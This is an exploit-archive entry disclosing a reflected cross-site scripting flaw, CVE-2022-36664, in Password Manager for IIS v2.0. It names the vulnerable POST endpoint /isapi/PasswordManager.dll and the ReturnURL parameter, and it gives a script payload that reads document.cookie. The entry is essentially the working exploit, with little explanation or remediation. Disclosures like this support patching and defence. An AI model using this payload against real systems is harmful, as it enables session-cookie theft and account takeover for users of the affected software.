Password Manager for IIS v2.0 - XSS
| EKU-ID: 54951 | CVE: CVE-2022-36664 | OSVDB-ID: |
| Author: VP4TR10T | Published: 2023-03-25 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 54951 | CVE: CVE-2022-36664 | OSVDB-ID: |
| Author: VP4TR10T | Published: 2023-03-25 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Password Manager for IIS v2.0 - XSS # Exploit Author: VP4TR10T # Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/ # Software Link: http://passwordmanager.adiscon.com/ <http://passwordmanager.adiscon.com/> # Version: *Version 2.0 # Tested on: WINDOWS # CVE : CVE-2022-36664 Affected URI (when changing user password): POST /isapi/PasswordManager.dll HTTP/1.1 Affected Parameter in http payload:*ReturnURL*=<script>alert(document.cookie)</script> *Cordially,*